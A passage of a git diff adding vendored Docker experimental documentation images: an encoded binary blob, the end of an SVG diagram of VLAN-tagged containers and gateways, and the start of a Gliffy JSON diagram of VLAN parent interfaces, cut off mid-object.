z$9mVvQ^)P17IbJq=TXIentF%@*UeafK^jUZM zY%xzfxFw$W;#g%ScC@RLJViv{{DLp_=ziV&AZ?_bDw%!_85R^+K&$c+cC`b7;gf^! zdkf+K++yzA!7U(VlTN^zS(Dh!w$apvnxHq?H_9PLvkrmBv6taxYGR@0E&bY$Jxn`^ z=%9sJCCM_P>1ycq+bfLYH{4p6!&4Tkb*@^gP_cSk(^iEz7E+LhakO54^8zbDujJO_*>BO_v$z zj4LH+Ds`DR|4;;TMfm!oSDjZ-&`LOgx+g|WEv+_0b z`B9yb=ef5Ik~F%XVxI9y;y5N!Nll=ggAuL{8xrbj76_0td5R|R>l;2Cfzn=3!d;Tg zH0#m>fYa6$rzGjzU3HJ%hU1Bn!%yO6*k-7#&+0A@tKgsc{ck9_A!uFh7yJE-kH^XH zthZn0>y9|4+em&Hl=vTnhm_+q(-x^$JEaDWqgv>riK>>G`411%0U!7QNTNZop)^vXVh`0e*yCO;tD%bx59ow#0oplpi`6f zY~gW~ldgiAr6oZJSpww3S40G^TrRSUENHG~msvj@=;JJ-b1j`ZSji?Ee zLTl2nAyhWMHZ3iUzksZ{!}?{2zVfqu5>Y~5@~9WF(^_a;b~E&z=QvCjw|5WNejE?; z{%reMvCHi`dto8d?R}82^=I3&WL#s(LB292YEg%0BERP|DVnt?s>gftiWB$s=Nbvd z=SUbyI<#ttj~x{S{u2T!Q2RFLG*^wk1i9**7zqh7h@5Gl>9xo#|6N~n$3bb;6VgFN zUzJ8^$nWgB*Ikyg?flq8)>h{1cvk?-rpolPY!0(GM!SOzXP)Y2)R$YiF3cd026Zgt zC$-2(vYvx-rJwev4#xy9N*bz{jirO3CfZV~CgeytlXU)Ef;V1Vt6J?s=q7 z=djU<1Y;vHrhH(A>JE~{)8;^F*eLe7O7b%gL#p|Ep;tpwO&~;P>{6;M#4_XfS--bT zEYZIdr}5mCRMMM&O}DlQ6Ni^>a7I$R%&KRyH7)Pr_G{OY?5)>8+e3}RjDg&&Hhxi12ACsFKf`f z7oYv-$yT{+T$4%p1=MQOd3No39a3SnDEYVOLS7{rc{wd@iSWE>-p@m$%r#o02ziO% zxSH&+4z!y~N?Q zoNX(k9_6Cxns2M!L>{r^m_I8Tcf zb}|n5Q3iXZAGJYRPf|ojKYn^}?zDp~9{^7qdg++dm&hou72(25PwkVg{v+vvH1|(V zZTY~N<{za>gyBEcYJXDDYhUqd5=9N`TIFpYkmjC}Wv0L1QF^n3MhFlZVwMZM8>jvG zc8j=_#^DgaDeevn1;A16ClmhZUAZw+BJO|7GvJ0_=j9@hPU0u26PbDX zQwosiGyh(|WsVhbh7B7VSM#^2+bq^7=g9m=hABYDPgecGAu$(OENNcD;k)pY6W93} z{o=)u5!DB6WD$7xgnuu7CS28A_MgzhT{@DDctf8{@&8fwUBv4B?w2@UQwv)(U58s+ z>L-e-FMaZbnb5scP*iU^!5_+F|`*or!y+O+GPRrl6W9d9hq!*i@F(^6WPi+`|1oe#XHM#V8H?3VEHJp-9MA2BWM&*oupsHc!G$ zIl7T+C&KU#W><18`npZ12wP^0?we&E%f*<#SDY9E*M>ei&)MOq5yfCnX@Y`f~9Nw$HcbW(91%)zevdoylqjmA@%P2At{~42)X&EiW?+*+-4v4Ycp!@dWvw zDgBqLm`+2=~Fdb&CFawyt!AknMLEA8XK%Aupv%7KBaJv3dUU~F zDnhkLRK0fs$mi3UOTj*Aqy7ON6&X^UKXq(73j#;3Um*(6a7w=Eb&`O@KbAb|FG5l5 z@1^u!`!0@ondd;Z;zY&k>0abQ{OZ~A%;vBnGk7d#l4-^k?+a$ESC=ES;2A|LIw+sG zov|H??43x6y?*(tHMoJ0&o49co4MN#Rz_Y6vX6e 
z-(5!8HguEgP@N24RWa6d`e#;0fe(FSLq%Bx^b6%W3e2L;B^-)861&F4|)pMSa)fA5d%70C71M6))P z@6i^+GmhDfM`)-_;NQtQtm#tp>BTTUxJM5ND88t#K~=eB4*1M?e{-tjjU*7!-i@fI z1OK@F9K%`!K$E_XgkzH6ncXhYx+T$6AO;}gM<%e&Bg)$WXxf1q8@o*ynQp zYOfb;D0%56T7))UhDk!_V{bZDXuC|Hatfm5`Sk|heaUkQ4+GhwK!Ady$P(q>(9pkb zXk=u>^>o|eHA?VUb+Q?^S-X9b&=9V~`K1fl4;eWigu`zNPn6y5&tIe;*}Ov(ut@TM zQG6T}*(ppat0YdXMG1(TCjEyY5rKi}HS#1o;&8mf4~Y}wxFj4D1pp`?RzP^Q*`u1^ z+7CH=y)dE^(W%v>rJTa3etdjF^$1sc`vS!2@rb?P}6)hsEi*@mn$*rsZ z*JfPQrK6anuKW4(vrA?lGMd2=a|$k6h-LJAAtTMlC75cSiZj&6P7!sI%c0aCFCn&_ zaw0M}v%sR}WI`hFLD>DRdboJN4l-IZz@+>2#LXSmU)?JFXaW!aQqmm<)w~WAnW$&8 zO06QprL)YG)PHgvYRjT^Cx2nrbs!rfMl1Wtp(E@8wGf-nc%bO#NzDYpej0D?x4Vl5 z>m)%{(S?aP5eP~xF_48ah}6gc{lcH2I-?jlkMGVt+md@3Yx}V)kSbG6R&v++l4&6SN}?GZ zRdZTx5P5hf?(j7jkpe_LZf8E*#8~F#!JL+s`~$ggf;}>kXtlZ;G5`Fg%3Njq=b<&l zU>uvr=7(hE?<{hSeL-8xBbhI9>Yytcel^R1t$?rf&cX~r`L^i=o=O^IOom_Dd{qUJ zail2X-MQHDJkJBL`vp2MOTG)`p?pgp>l(&y%MI_{_LSQNCk`w3YSyDK0DjbJ@_kjH z;~sf4NKJJ26B_xmzpX--4KG(+W{l;!bSMkmne469Ugk|SEIl8^SpJSU@$a*kq(bN30OYWo%wjL35S$m2|v-vCEV z9;fQiEDv%U61L=z%FBOS5sN7^W_wf@xm}`e6~Qx(V3xYgj5KlI_KNU67`+1Y1GMbU zJCM?69K(%tleG#o%!G9113xSRR8o@6+FDyr)PDtYxdf^ND7r|>3+m2t;eOlHAbwrs zbw8)tp{`?#N>Hy>Vw#I7(z02B0x^N^}%SwYLlWp@+i|) zatj!bQnjjCdTV?pg>rnxS44WT0OEQfm>^wgO2=?0i6_}Y_~e$TTEI%|SPD1@R>bq< zg2`!ar%7_C%Kl<)qLZQSw{jsf^Jc+~V#S-%V{$ng&!1vV3q-tD?feCew$g(`diU5! 
zW=HzyUb}&!#!sNpq;x+tBf*c`0eX-_G$KL-Wq=;r!YaE6?I+d zJP4v zYwZ20rc)i-xvV)D@&Z76bEK3vf9%rU&<65}(H%_@)zH<-)#%-2Dn595eqv$TAnBkM z^?WTC_!ofY$wQ{V_+6uP$VBR2BBM`Sg;4ED@K2Etf1mSu{D-HS(;C?LO{??a92!_V z^fEQ&{q6@vX}el^h4NG4kf=6kDcv)sPjqb5d5K=xaT0#lv=c#($wC>ad^E@~Mm@Gg z*#Dobs?9oLE`6UK;Mo!1-gn+^VhULP-@Na-+)QVz4a;9j(o@sY!kuLImJ|A44rgn` zIu*tSH};M!Wk)1otS&LGhX;^ipQFMHRsVIpn(Nv(l(f-B@=!QB7Ef`Ftz2%qq+RF( z?YerZIHz%hxh0M{&AUy=+ar(f#0%E`)axho@(%&|?>IU;FY$xcE`Odt=|Q8V#;qCF^rc~|!; z$03QC1fa!sN2;rnk3x_e@|#I(4czUYba3DZ(ZWR-w~yzV%!jnS zI=|~Z2r@9^K6cOV9SQpw{wF37N%lAT=kQO~$#=au6eB#p?KtpWTcCmd!iM34ElUM` zT%NWTfA6=o639Q!#xt%X%4G|l@4IemhMEa^QItX%L_qY$Ma<64;qt#U2v=WU9$EjA z9y*uPxeXDO#I3#AAZpSPWa_)nnPJ12t%$=BrW6EHBz%c#iB`PC#H;UpUmx|IqEa}R z7rrqO^$_=QQo2H5f_61(&4qg)TW+IrnFGPhZ{~x4OK4gEcN(vBVXo1T=ck8fCUp6g%z?@m#P*^>KMXZd7=E>JyreSU^X zm&dee)0)ofFnxNm&F9I#?R$;Wa-}&AZ>SGmSY7Xaa?bw=^DkUntS0V%@Z1ESqs_;8 zB%Kt!IXVxTp73@|usNa7{M#zezDcJxbX|GuADdvInV)}7{OoD<@}Bi=_79OW>$m?g z`@eA2+2Y#lhUZV79p>-|Dl~EXVb}it@|S0quN(C$Xw0z|zW3|pzC7=e*S+%Ht15O} z@PGbzli_EFo6LXr8F5J6UioSE_0JD~Z_+CHU^$2X`F*{(@yrtv}nS5&!vBR_42NAzV-A%y8Q(dUenH`-^_q-7HNxz5MeY)8FOa zr*FOXrR@Ixx_i}SR>BV~r~Y)K1J1J{=R9QKWpYm{_9*M9=UPf z#iNJjFFzo6UDuJ@{{7O=r)w`>J9m0ZzP{XlyB||7|J(VuaDhQ-V3hUo-W%6agW2V_ zWJdk46ezQe-oO8ud;g7vb(?Rxn7;qL{e#Wx+}mI`=qZ5}=ncW#H{L8@?Uj_5D>q|nKA5%jk{U=wX7;6)2FF{BBqTqj@vwYd~H*~w%fp*k;|sH>+@1|w*I$?a-V1P zd+48%X}y>+<)EMxODP*S$b{vqQy*sV>MiBYSk->?!91O=^h+_kcTZn8ykpo_c_!IT zX|G7RN!Ox^y1HxWv*+ip+-container1 -vlan10192.168.1.2/24eth0 -802.1qtrunkNetworkRouter (gateway)vlan10 -192.168.1.1/24vlan20172.16.1.1/24vlan3010.1.1.1/16eth0.10eth0.20container2 -vlan20172.16.1.2/24container3 -vlan3010.1.1.2/16eth0.30DockerHost \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.gliffy b/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.gliffy new file mode 100644 index 0000000000..4d9f2761c4 --- /dev/null +++ 
b/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.gliffy @@ -0,0 +1 @@ +{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#FFFFFF","width":566,"height":581,"nodeIndex":500,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":{"uid":"com.gliffy.theme.beach_day","name":"Beach Day","shape":{"primary":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#AEE4F4","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#004257"}},"secondary":{"strokeWidth":2,"strokeColor":"#CDB25E","fillColor":"#EACF81","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#332D1A"}},"tertiary":{"strokeWidth":2,"strokeColor":"#FFBE00","fillColor":"#FFF1CB","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#000000"}},"highlight":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#00A4DA","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#ffffff"}}},"line":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"none","arrowType":2,"interpolationType":"quadratic","cornerRadius":0,"text":{"color":"#002248"}},"text":{"color":"#002248"},"stage":{"color":"#FFFFFF"}},"viewportType":"default","fitBB":{"min":{"x":-3,"y":-1.0100878848684474},"max":{"x":566,"y":581}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":-5.0,"y":-1.0100878848684474,"rotation":0.0,"id":499,"width":569.0,"height":582.0100878848684,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":103,"lockAspectRatio":false,"lockShape":false,"children":[{"x":374.0,"y":44.510087884868476,"rotation":0.0,"id":497,"width":145.0,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":101,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{
"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Network & other

Docker Hosts

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":157.40277777777783,"y":108.18042331083174,"rotation":0.0,"id":492,"width":121.19444444444446,"height":256.03113588084784,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":99,"lockAspectRatio":false,"lockShape":false,"children":[{"x":-126.13675213675185,"y":31.971494223140525,"rotation":180.0,"id":453,"width":11.1452323717951,"height":61.19357171974171,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":57,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#38761d","fillColor":"#38761d","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-121.4915197649562,-156.36606993796556],[-121.49151976495622,-99.52846483047983],[-229.68596420939843,-99.52846483047591],[-229.68596420939843,-34.22088765589871]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":289.82598824786317,"y":137.23816896148608,"rotation":180.0,"id":454,"width":11.1452323717951,"height":61.19357171974171,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":55,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#38761d","fillColor":"#38761d","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[291.05455395299924,191.93174068122784],[291.05455395299924,106.06051735724502],[186.27677617521402,106.06051735724502],[186.27677617521402,69.78655839914467]],"lockSegments":{},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":372.0,"y":332.0100878848684,"rotation":0.0,"id":490,"width":144.0,"height":60.0,"uid"
:"com.gliffy.shape.basic.basic_v1.default.group","order":97,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":9.5,"rotation":0.0,"id":365,"width":141.0,"height":40.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":98,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

 Parent: eth0.30

VLAN: 30

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":0.0,"rotation":0.0,"id":342,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":96,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#eb6c6c","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":52.0,"y":332.0100878848684,"rotation":0.0,"id":489,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":92,"lockAspectRatio":false,"lockShape":false,"children":[{"x":1.0,"y":10.5,"rotation":0.0,"id":367,"width":138.0,"height":40.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":93,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Parent: eth0.10

VLAN ID: 10

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":0.0,"rotation":0.0,"id":340,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":91,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#5fcc5a","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":289.40277777777794,"y":126.43727235088903,"rotation":0.0,"id":486,"width":121.19444444444446,"height":250.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":88,"lockAspectRatio":false,"lockShape":false,"children":[{"x":236.18596420940128,"y":158.89044937932732,"rotation":0.0,"id":449,"width":11.1452323717951,"height":59.50782702798556,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":53,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#cc0000","fillColor":"#cc0000","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-121.49151976495682,-152.05853787273531],[-121.49151976495682,-81.64750068755309],[-229.68596420940125,-81.64750068755139],[-229.68596420940125,-33.27817949077674]],"lockSegments":{},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":-179.77677617521388,"y":56.523633779319084,"rotation":0.0,"id":450,"width":11.1452323717951,"height":59.50782702798556,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":51,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#cc0000","fillColor":"#cc0000","dashStyle":"1.0,
1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[291.0545539529992,186.6444547140887],[291.0545539529992,117.79470574474337],[186.276776175214,117.79470574474337],[186.276776175214,67.8640963321146]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":447.0,"y":150.01008788486848,"rotation":0.0,"id":472,"width":46.99999999999994,"height":27.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":87,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":473,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":86,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":5.485490196078445,"y":5.153846153846132,"rotation":0.0,"id":474,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":84,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.901960784313701,"y":9.0,"rotation":0.0,"id":475,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":82,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.
basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":368.0,"y":101.71008483311067,"rotation":0.0,"id":477,"width":140.0,"height":56.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":80,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Gateway 10.1.30.1

  and other containers on the same VLAN/subnet

 

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":350.51767083236393,"y":87.47159983339776,"rotation":0.0,"id":478,"width":175.20345848455912,"height":73.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":79,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#cc0000","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":94.0,"y":155.01008788486848,"rotation":0.0,"id":463,"width":46.99999999999994,"height":27.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":78,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":464,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":77,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":5.485490196078445,"y":5.153846153846132,"rotation":0.0,"id":465,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":75,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.901960784313701,"y":9.0,"rotation":0.0,"id":466,"widt
h":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":73,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":80.0,"y":109.71008483311067,"rotation":0.0,"id":468,"width":140.0,"height":56.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":71,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Gateway 10.1.10.1

  and other containers on the same VLAN/subnet

 

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":62.51767083236396,"y":95.47159983339776,"rotation":0.0,"id":469,"width":175.20345848455912,"height":73.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":70,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#38761d","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":341.0,"y":40.010087884868476,"rotation":0.0,"id":460,"width":46.99999999999994,"height":27.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":69,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":417,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":68,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":5.485490196078445,"y":5.153846153846132,"rotation":0.0,"id":418,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":66,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.901960784313701,"y":9.0,"rotation":0.0,"id":419,"widt
h":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":64,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":198.51767083236396,"y":41.471599833397754,"rotation":0.0,"id":459,"width":175.20345848455912,"height":79.73848499971291,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":62,"lockAspectRatio":false,"lockShape":false,"children":[{"x":17.482329167636067,"y":14.23848499971291,"rotation":0.0,"id":458,"width":140.0,"height":56.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":61,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Gateway 10.1.20.1

  and other containers on the same VLAN/subnet

 

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":0.0,"rotation":0.0,"id":330,"width":175.20345848455912,"height":73.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":59,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#ff9900","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":279.0,"y":129.01008788486848,"rotation":0.0,"id":440,"width":5.0,"height":227.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":49,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#ff9900","fillColor":"#ff9900","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[4.000000000000057,-25.08952732449731],[4.000000000000114,176.01117206537933]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":56.0,"y":503.0913886978766,"rotation":0.0,"id":386,"width":135.0,"height":20.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":48,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"